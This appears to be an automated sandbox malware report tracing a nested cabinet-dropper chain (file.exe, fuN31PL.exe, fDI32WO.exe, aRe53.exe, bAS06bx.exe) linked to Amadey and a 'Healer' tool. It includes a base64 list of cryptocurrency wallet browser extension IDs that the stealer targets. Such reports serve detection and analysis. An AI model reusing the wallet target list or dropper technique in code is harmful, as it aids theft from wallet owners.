                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00A81F90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00973BA20_2_00973BA2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00975C9E0_2_00975C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A3BA21_2_001A3BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A5C9E1_2_001A5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A83BA22_2_00A83BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A85C9E2_2_00A85C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeCode function: 5_2_0502F7C85_2_0502F7C8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeCode function: 5_2_0502F3685_2_0502F368
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 642008 bytes, 2 files, at 0x2c +A "fuN31PL.exe" +A "dXL24Wx.exe", ID 1862, number 1, 26 datablocks, 0x1503 compression
                          Source: fuN31PL.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 450562 bytes, 2 files, at 0x2c +A "fDI32WO.exe" +A "cfh9400.exe", ID 1756, number 1, 21 datablocks, 0x1503 compression
                          Source: fDI32WO.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50172 bytes, 2 files, at 0x2c +A "aRe53.exe" +A "bAS06bx.exe", ID 1686, number 1, 6 datablocks, 0x1503 compression
                          Source: file.exe, 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeSection loaded: sfc.dllJump to behavior
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe 9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          Source: file.exeReversingLabs: Detection: 69%
                          Source: file.exeVirustotal: Detection: 58%
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00971F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_001A1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00A81F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aRe53.exe.logJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/8@0/1
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0097597D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00973FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00973FEF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeCode function: 3_2_00007FF815F61B10 ChangeServiceConfigA,3_2_00007FF815F61B10
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: bAS06bx.exe.2.dr, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00974FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00974FE0
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_00972BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCommand line argument: Kernel32.dll1_2_001A2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCommand line argument: Kernel32.dll2_2_00A82BFB
                          Source: C:\Users\user\Desktop\file.exeAutomated click: OK
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeAutomated click: OK
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: wextract.pdb source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, dXL24Wx.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: fDI32WO.exe, 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, aRe53.exe, 00000003.00000000.308600922.00000000005E2000.00000002.00000001.01000000.00000006.sdmp, aRe53.exe.2.dr
                          Source: Binary string: C:\setilikavegor\mixu76 bej yovesuwudel89 vifohe.pdb source: fuN31PL.exe, 00000001.00000003.307160395.0000000004794000.00000004.00000020.00020000.00000000.sdmp, cfh9400.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097724D push ecx; ret 0_2_00977260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A724D push ecx; ret 1_2_001A7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A8724D push ecx; ret 2_2_00A87260
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeCode function: 3_2_00007FF815F6000B pushad ; ret 3_2_00007FF815F60029
                          Source: cfh9400.exe.1.drStatic PE information: section name: .jexose
                          Source: cfh9400.exe.1.drStatic PE information: section name: .cim
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00972F1D
                          Source: aRe53.exe.2.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00971AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_001A1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00A81AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
